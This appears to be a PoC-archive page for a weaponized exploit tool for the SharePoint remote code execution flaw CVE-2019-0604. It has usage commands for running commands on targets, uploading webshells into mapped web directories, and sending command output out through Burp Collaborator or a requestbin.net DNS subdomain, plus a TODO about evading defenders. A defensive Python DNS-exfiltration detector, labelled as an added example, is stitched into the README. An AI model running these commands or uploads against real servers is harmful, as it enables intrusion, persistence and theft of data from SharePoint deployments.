Related vulnerability
Title: Microsoft SharePoint input validation error vulnerability (CVE-2019-0604) Description: Microsoft SharePoint is an enterprise business collaboration platform from Microsoft (USA). The platform is used to integrate business information and lets users share work, collaborate with others, organize projects and workgroups, and search for people and information. A remote code execution vulnerability exists in Microsoft SharePoint, caused by the program failing to check the source markup of an application package. An attacker could exploit this vulnerability to execute arbitrary code by means of a specially crafted SharePoint application package. The following versions are affected: Microsoft SharePoint Enterprise Server 2016, SharePoint Fou
Description
Automated tool to exploit sharepoint CVE-2019-0604
Introduction
# Weaponized CVE-2019-0604
Automated Exploit Tool to Maximize CVE-2019-0604.
## Requirement
The `requirements.txt` file lists all Python libraries this tool depends on; install them with
```
$ pip install -r requirements.txt
```
## Manual blind exploit (with or without credentials)
```
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>
```
## Upload function
Upload anything cool (webshell, recon tool, ...)
```
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx
```
### Directory Mapping
```
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/
```
## Use OOB to get command result
### With [collaborator\_http\_api](https://github.com/tree-chtsec/burp-python-plugins) Burp Extension
1. Install `collaborator_http_api.py` into Burp Suite (Pro, since Collaborator is a Pro-only feature).
2. Make sure Burp Suite is running on the same machine as this exploit.
3. Fire, enjoy the retrieved output :)
```
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>
```

### With a DNS log service such as requestbin.net
```sh
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"
```
Data retrieved from DNS (hex-encoded):
```
2050524956494c4547455320494e464f524d4154494f4e
...
```
Decode it yourself :)
```
PRIVILEGES INFORMATION
...
```
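As an added defender-side example (not part of this tool), the following Python scanner walks constructed DNS query log lines, flags queries under a watched domain whose labels are entirely hex-encoded data, and decodes them the way the output above is decoded. The log line format, client field and watched suffix are assumptions; the sample lines are constructed.

```python
import re
import string

# Constructed sample DNS query log lines (not from the page). Labels in front
# of the watched suffix carry hex-encoded command output, as in the README.
SAMPLE_DNS_LOG = """\
2019-03-01T10:00:01Z client=10.0.0.5 query=2050524956494c4547455320494e464f524d4154494f4e.d.requestbin.net A
2019-03-01T10:00:02Z client=10.0.0.5 query=www.example.com A
2019-03-01T10:00:03Z client=10.0.0.7 query=00507269.7669.d.requestbin.net A
2019-03-01T10:00:04Z client=10.0.0.9 query=mail.example.org MX
"""

HEX_LABEL = re.compile(r"^[0-9a-fA-F]+$")
PRINTABLE = set(string.printable)

def hex_labels(fqdn, watched_suffix):
    """Return the labels that precede watched_suffix in fqdn if every one is even-length hex, else []."""
    if not fqdn.lower().endswith("." + watched_suffix.lower()):
        return []
    labels = fqdn[: -(len(watched_suffix) + 1)].split(".")
    # A single non-hex or odd-length label means this is not encoded data.
    if all(HEX_LABEL.match(lab) and len(lab) % 2 == 0 for lab in labels):
        return labels
    return []

def decode_labels(labels):
    """Join the hex labels and decode them; non-printable bytes are rendered as \\xNN."""
    raw = bytes.fromhex("".join(labels)).decode("latin-1")
    return "".join(ch if ch in PRINTABLE else "\\x%02x" % ord(ch) for ch in raw)

def find_exfil(log_text, watched_suffix):
    """Scan log lines and return (client, decoded_text) for each query carrying hex-encoded data."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r"client=(\S+) query=(\S+)", line)
        if not m:
            continue
        client, fqdn = m.groups()
        labels = hex_labels(fqdn, watched_suffix)
        if labels:
            hits.append((client, decode_labels(labels)))
    return hits

if __name__ == "__main__":
    for client, text in find_exfil(SAMPLE_DNS_LOG, "d.requestbin.net"):
        print("%s -> %r" % (client, text))
```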
## TODO
- [x] Argument Parser
- [x] SharePoint, CVE-2019-0604
- [ ] split cmd into multiple parts (in args.cmds)
- [x] specify binary on demand, avoiding detection by the blue team (currently hardcodes cmd.exe)
## Author
* Tree
File snapshot
[4.0K] /data/pocs/e7b277cd6b4283bbb7bd930f0f9be00a8fd8dcac
├── [3.0K] burpReq.py
├── [9.5K] exploit.py
├── [1.0K] LICENSE
├── [4.0K] oob
│ ├── [1.3K] collab_handler.py
│ ├── [2.1K] decoder.py
│ ├── [ 0] __init__.py
│ ├── [1.0K] payload.ps1
│ └── [ 944] sample.json
├── [2.4K] README.md
├── [ 34] requirements.txt
├── [3.4K] sharepointkit.py
└── [577K] SHAREPOINT_RCE_OOB.png
1 directory, 12 files
Notes
1. It is recommended to access the code through its original source first.
2. If the source has been removed or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying or donating for the local POC. Thank you for your support.